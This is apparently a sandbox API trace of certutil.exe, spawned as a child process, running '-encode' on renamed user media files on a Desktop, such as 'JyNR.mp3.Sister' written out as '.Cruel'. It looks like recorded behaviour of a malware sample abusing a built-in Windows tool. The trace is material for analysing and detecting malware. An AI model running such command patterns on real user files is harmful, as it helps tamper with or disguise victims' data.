[0232.321] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x24063d7c310 [0232.321] LocalFree (hMem=0x24063d7c0a0) returned 0x0 [0232.321] LocalFree (hMem=0x24063d7cf30) returned 0x0 [0232.321] LocalFree (hMem=0x0) returned 0x0 [0232.321] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0232.321] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0232.322] GetCommandLineW () returned="certutil -encode \"JyNR.mp3.Sister\" \"JyNR.mp3.Cruel\"" [0232.322] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x24063d8baf0 [0232.322] GetSystemTime (in: lpSystemTime=0xf24c47f700 | out: lpSystemTime=0xf24c47f700*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x6, wMilliseconds=0x35f)) [0232.322] SystemTimeToFileTime (in: lpSystemTime=0xf24c47f700, lpFileTime=0xf24c47f6f8 | out: lpFileTime=0xf24c47f6f8) returned 1 [0232.322] FileTimeToLocalFileTime (in: lpFileTime=0xf24c47f6f8, lpLocalFileTime=0xf24c47f6c0 | out: lpLocalFileTime=0xf24c47f6c0) returned 1 [0232.322] FileTimeToSystemTime (in: lpFileTime=0xf24c47f6c0, lpSystemTime=0xf24c47f430 | out: lpSystemTime=0xf24c47f430) returned 1 [0232.322] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xf24c47f430, lpFormat=0x0, lpDateStr=0xf24c47f540, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0232.323] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xf24c47f430, lpFormat=0x0, lpTimeStr=0xf24c47f440, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0232.323] _vsnwprintf (in: _Buffer=0xf24c47f44e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xf24c47f418 | out: _Buffer=" 06.863s") returned 8 [0232.323] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x24063d8e960 [0232.323] SetLastError (dwErrCode=0x80070716) [0232.323] _vsnwprintf (in: _Buffer=0xf24c47f4c8, _BufferCount=0xb, _Format="%d", _ArgList=0xf24c47f4b8 | out: _Buffer="948") returned 3 [0232.323] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xf24c47f280, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0232.323] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x24063d8bb90 [0232.323] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x24063d84500 [0232.323] LocalFree (hMem=0x24063d8e960) returned 0x0 [0232.324] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf24c47f770 | out: lpSystemTimeAsFileTime=0xf24c47f770*(dwLowDateTime=0xb515935e, dwHighDateTime=0x1d6141f)) [0232.324] GetLocalTime (in: lpSystemTime=0xf24c47f7a8 | out: lpSystemTime=0xf24c47f7a8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x6, wMilliseconds=0x360)) [0232.324] SystemTimeToFileTime (in: lpSystemTime=0xf24c47f7a8, lpFileTime=0xf24c47f780 | out: lpFileTime=0xf24c47f780) returned 1 [0232.324] CompareFileTime (lpFileTime1=0xf24c47f780, lpFileTime2=0xf24c47f770) returned 1 [0232.324] _vsnwprintf (in: _Buffer=0xf24c47f7b8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xf24c47f748 | out: _Buffer="GMT + 2.00") returned 10 [0232.324] LocalFree (hMem=0x24063d8baf0) returned 0x0 [0232.324] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0232.324] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0232.325] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0232.325] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0232.325] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0232.325] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xf24c47f7e8 | out: _Buffer="10.0.15063.447") returned 14 [0232.325] GetACP () returned 0x4e4 [0232.325] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0232.393] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x24063d8b790 [0232.393] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x24063d8b790, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0232.393] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x24063d8e360 [0232.393] _vsnwprintf (in: _Buffer=0x24063d8e360, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf24c47f838 | out: _Buffer="10.0.15063.447 retail") returned 21 [0232.393] LocalFree (hMem=0x24063d8b790) returned 0x0 [0232.393] LocalFree (hMem=0x0) returned 0x0 [0232.394] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0232.394] GetACP () returned 0x4e4 [0232.394] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0232.394] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x24063d8bcf0 [0232.394] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x24063d8bcf0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0232.394] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x24063d8e3a0 [0232.394] _vsnwprintf (in: _Buffer=0x24063d8e3a0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf24c47f838 | out: _Buffer="10.0.15063.447 retail") returned 21 [0232.394] LocalFree (hMem=0x24063d8bcf0) returned 0x0 [0232.394] LocalFree (hMem=0x0) returned 0x0 [0232.394] GetACP () returned 0x4e4 [0232.394] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0232.394] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x24063d8bc30 [0232.394] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x24063d8bc30, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0232.394] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x24063d8e4a0 [0232.394] _vsnwprintf (in: _Buffer=0x24063d8e4a0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf24c47f868 | out: _Buffer="10.0.15063.447 retail") returned 21 [0232.394] LocalFree (hMem=0x24063d8bc30) returned 0x0 [0232.394] LocalFree (hMem=0x24063d8e360) returned 0x0 [0232.394] LocalFree (hMem=0x24063d8e3a0) returned 0x0 [0232.394] LocalFree (hMem=0x24063d8e4a0) returned 0x0 [0232.395] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0232.395] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0232.395] GetStockObject (i=0) returned 0x900010 [0232.395] RegisterClassW (lpWndClass=0xf24c47f990) returned 0xc1a2 [0232.396] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1d02be [0232.517] NtdllDefWindowProc_W () returned 0x0 [0232.517] NtdllDefWindowProc_W () returned 0x1 [0232.524] NtdllDefWindowProc_W () returned 0x0 [0232.537] UpdateWindow (hWnd=0x1d02be) returned 1 [0232.538] PostMessageW (hWnd=0x1d02be, Msg=0x400, wParam=0x0, lParam=0x24063d7217e) returned 1 [0232.538] GetMessageW (in: lpMsg=0xf24c47f9e0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf24c47f9e0) returned 1 [0232.538] TranslateMessage (lpMsg=0xf24c47f9e0) returned 0 [0232.538] DispatchMessageW (lpMsg=0xf24c47f9e0) returned 0x0 [0232.538] NtdllDefWindowProc_W () returned 0x0 [0232.538] GetMessageW (in: lpMsg=0xf24c47f9e0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf24c47f9e0) returned 1 [0232.538] TranslateMessage (lpMsg=0xf24c47f9e0) returned 0 [0232.538] DispatchMessageW (lpMsg=0xf24c47f9e0) returned 0x0 [0232.538] LocalAlloc (uFlags=0x0, uBytes=0x56) returned 0x24063d80e30 [0232.538] LocalAlloc (uFlags=0x0, uBytes=0x62) returned 0x24063d78920 [0232.538] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0232.538] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0232.539] SetLastError (dwErrCode=0x80070716) [0232.539] _vsnwprintf (in: _Buffer=0xf24c47f3e8, _BufferCount=0xb, _Format="%d", _ArgList=0xf24c47f3d8 | out: _Buffer="465") returned 3 [0232.539] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xf24c47f1a0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0232.539] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x24063d7c220 [0232.539] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0232.539] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0232.539] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xf24c47f180, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0232.539] GetLastError () returned 0xcb [0232.539] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0232.540] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0232.540] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0232.540] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0232.540] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0232.540] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0232.540] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0232.540] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0232.540] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0232.540] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0232.540] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0232.540] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0232.540] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0232.540] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0232.540] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0232.540] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0232.540] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0232.540] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0232.540] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0232.540] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0232.540] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0232.540] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xf24c47ee48 | out: phkResult=0xf24c47ee48*=0x23c) returned 0x0 [0232.540] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x24063d7b270 [0232.541] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xf24c47f3b8, lpData=0xf24c47f3e8, lpcbData=0xf24c47f3b0*=0x4 | out: lpType=0xf24c47f3b8*=0x0, lpData=0xf24c47f3e8*=0x0, lpcbData=0xf24c47f3b0*=0x4) returned 0x2 [0232.541] LocalFree (hMem=0x24063d7b270) returned 0x0 [0232.541] RegCloseKey (hKey=0x23c) returned 0x0 [0232.541] LocalFree (hMem=0x0) returned 0x0 [0232.541] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x24063d9cfc0 [0232.593] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0232.593] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0232.593] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0232.593] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0232.593] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0232.593] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0232.593] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0232.593] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0232.594] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0232.594] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0232.594] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0232.595] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0232.595] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0232.595] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0232.595] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0232.595] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0232.595] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x24063da1fd0 [0232.595] GetComputerNameW (in: lpBuffer=0x24063da1fd0, nSize=0xf24c47f3b0 | out: lpBuffer="NQDPDE", nSize=0xf24c47f3b0) returned 1 [0232.595] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xf24c47f380 | out: lpBuffer=0x0, nSize=0xf24c47f380) returned 0 [0232.596] GetLastError () returned 0xea [0232.596] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x24063d8bb30 [0232.596] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x24063d8bb30, nSize=0xf24c47f380 | out: lpBuffer="NQdPdE", nSize=0xf24c47f380) returned 1 [0232.596] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0232.605] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x24063da2100, cbCertEncoded=0x14f69) returned 0x0 [0232.611] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x24063da2100, cbCrlEncoded=0x14f69) returned 0x0 [0232.613] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x24063da2100, cbEncoded=0x14f69, dwFlags=0x8000, pDecodePara=0xf24c47f260, pvStructInfo=0xf24c47f2f0, pcbStructInfo=0xf24c47f2e4 | out: pvStructInfo=0xf24c47f2f0, pcbStructInfo=0xf24c47f2e4) returned 0 [0232.613] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x24063da2100, cbEncoded=0x14f69, dwFlags=0x8000, pDecodePara=0xf24c47f260, pvStructInfo=0xf24c47f2f0, pcbStructInfo=0xf24c47f2e4 | out: pvStructInfo=0xf24c47f2f0, pcbStructInfo=0xf24c47f2e4) returned 0 [0232.614] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x24063da2100, cbEncoded=0x14f69, dwFlags=0x8000, pDecodePara=0xf24c47f260, pvStructInfo=0xf24c47f2f0, pcbStructInfo=0xf24c47f2e4 | out: pvStructInfo=0xf24c47f2f0, pcbStructInfo=0xf24c47f2e4) returned 0 [0232.614] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x24063d7d000 [0232.624] CryptMsgUpdate (hCryptMsg=0x24063d7d000, pbData=0x24063da2100, cbData=0x14f69, fFinal=1) returned 0 [0232.624] GetLastError () returned 0x8009310b [0232.625] CryptMsgClose (hCryptMsg=0x24063d7d000) returned 1 [0232.625] GetFileAttributesExW (in: lpFileName="JyNR.mp3.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\jynr.mp3.sister"), fInfoLevelId=0x0, lpFileInformation=0xf24c47f310 | out: lpFileInformation=0xf24c47f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41f92750, ftCreationTime.dwHighDateTime=0x1d5eb7b, ftLastAccessTime.dwLowDateTime=0xd2a616e0, ftLastAccessTime.dwHighDateTime=0x1d5ea6e, ftLastWriteTime.dwLowDateTime=0xd2a616e0, ftLastWriteTime.dwHighDateTime=0x1d5ea6e, nFileSizeHigh=0x0, nFileSizeLow=0x14f69)) returned 1 [0232.625] _vsnwprintf (in: _Buffer=0xf24c47f318, _BufferCount=0xb, _Format="%d", _ArgList=0xf24c47f308 | out: _Buffer="359") returned 3 [0232.625] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xf24c47f0d0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0232.625] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x24063da1be0 [0232.625] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0232.625] _vsnwprintf (in: _Buffer=0xf24c47e300, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xf24c47f358 | out: _Buffer="Input Length = 85865") returned 20 [0232.625] GetFileType (hFile=0x50) returned 0x2 [0232.625] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf24c47e300*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xf24c47e2b4, lpReserved=0x0 | out: lpBuffer=0xf24c47e300*, lpNumberOfCharsWritten=0xf24c47e2b4*=0x14) returned 1 [0232.698] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0232.699] _vsnwprintf (in: _Buffer=0xf24c47e300, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf24c47f358 | out: _Buffer="\n") returned 1 [0232.699] GetFileType (hFile=0x50) returned 0x2 [0232.699] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf24c47e300*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf24c47e2b4, lpReserved=0x0 | out: lpBuffer=0xf24c47e300*, lpNumberOfCharsWritten=0xf24c47e2b4*=0x1) returned 1 [0232.878] GetFileAttributesExW (in: lpFileName="JyNR.mp3.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\jynr.mp3.cruel"), fInfoLevelId=0x0, lpFileInformation=0xf24c47f310 | out: lpFileInformation=0xf24c47f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb55b3a94, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xb55b3a94, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb56205e0, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x1cd6a)) returned 1 [0232.878] _vsnwprintf (in: _Buffer=0xf24c47f318, _BufferCount=0xb, _Format="%d", _ArgList=0xf24c47f308 | out: _Buffer="361") returned 3 [0232.878] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xf24c47f0d0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0232.878] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x24063da1d30 [0232.878] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0232.878] _vsnwprintf (in: _Buffer=0xf24c47e300, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xf24c47f358 | out: _Buffer="Output Length = 118122") returned 22 [0232.878] GetFileType (hFile=0x50) returned 0x2 [0232.878] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf24c47e300*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0xf24c47e2b4, lpReserved=0x0 | out: lpBuffer=0xf24c47e300*, lpNumberOfCharsWritten=0xf24c47e2b4*=0x16) returned 1 [0232.948] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0232.948] _vsnwprintf (in: _Buffer=0xf24c47e300, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf24c47f358 | out: _Buffer="\n") returned 1 [0232.948] GetFileType (hFile=0x50) returned 0x2 [0232.948] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf24c47e300*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf24c47e2b4, lpReserved=0x0 | out: lpBuffer=0xf24c47e300*, lpNumberOfCharsWritten=0xf24c47e2b4*=0x1) returned 1 [0233.024] LocalFree (hMem=0x24063da2100) returned 0x0 [0233.025] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0233.025] _vsnwprintf (in: _Buffer=0xf24c47f378, _BufferCount=0xb, _Format="%d", _ArgList=0xf24c47f368 | out: _Buffer="2022") returned 4 [0233.025] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xf24c47f130, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0233.025] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x24063d79160 [0233.025] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0233.025] _vsnwprintf (in: _Buffer=0xf24c47e360, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xf24c47f3b8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0233.025] GetFileType (hFile=0x50) returned 0x2 [0233.025] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf24c47e360*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xf24c47e314, lpReserved=0x0 | out: lpBuffer=0xf24c47e360*, lpNumberOfCharsWritten=0xf24c47e314*=0x31) returned 1 [0233.098] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0233.098] _vsnwprintf (in: _Buffer=0xf24c47e360, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf24c47f3b8 | out: _Buffer="\n") returned 1 [0233.098] GetFileType (hFile=0x50) returned 0x2 [0233.098] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf24c47e360*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf24c47e314, lpReserved=0x0 | out: lpBuffer=0xf24c47e360*, lpNumberOfCharsWritten=0xf24c47e314*=0x1) returned 1 [0233.175] LocalFree (hMem=0x0) returned 0x0 [0233.175] LocalFree (hMem=0x24063d78920) returned 0x0 [0233.175] LocalFree (hMem=0x24063d80e30) returned 0x0 [0233.175] SetLastError (dwErrCode=0x80070716) [0233.175] _vsnwprintf (in: _Buffer=0xf24c47f3e8, _BufferCount=0xb, _Format="%d", _ArgList=0xf24c47f3d8 | out: _Buffer="511") returned 3 [0233.175] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xf24c47f1a0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0233.176] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x24063da1c70 [0233.176] PostQuitMessage (nExitCode=0) [0233.176] GetMessageW (in: lpMsg=0xf24c47f9e0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf24c47f9e0) returned 0 [0233.176] LocalFree (hMem=0x24063d8bb30) returned 0x0 [0233.176] LocalFree (hMem=0x24063da1fd0) returned 0x0 [0233.176] LocalFree (hMem=0x0) returned 0x0 [0233.176] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0233.177] GetLastError () returned 0x7e [0233.177] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0233.177] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0233.177] DllMain () returned 0x1 [0233.177] LocalFree (hMem=0x24063d8bb90) returned 0x0 [0233.177] LocalFree (hMem=0x24063d7c220) returned 0x0 [0233.177] LocalFree (hMem=0x24063da1be0) returned 0x0 [0233.177] LocalFree (hMem=0x24063da1d30) returned 0x0 [0233.177] LocalFree (hMem=0x24063d79160) returned 0x0 [0233.177] LocalFree (hMem=0x24063da1c70) returned 0x0 [0233.178] LocalFree (hMem=0x24063d84500) returned 0x0 [0233.178] LocalFree (hMem=0x24063d7c310) returned 0x0 [0233.178] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0233.178] GetLastError () returned 0x7e [0233.178] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0233.178] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0233.178] DllMain () returned 0x1 [0233.178] exit (_Code=0) Thread: id = 61 os_tid = 0x4fc Thread: id = 62 os_tid = 0xdd8 Process: id = "21" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x28ed2000" os_pid = "0x1024" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"KoSrfJhDHVv1O_ 2.m4a.Sister\" \"KoSrfJhDHVv1O_ 2.m4a.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 63 os_tid = 0x1054 [0234.514] GetStartupInfoW (in: lpStartupInfo=0xeabec7fb30 | out: lpStartupInfo=0xeabec7fb30*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"KoSrfJhDHVv1O_ 2.m4a.Sister\" \"KoSrfJhDHVv1O_ 2.m4a.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 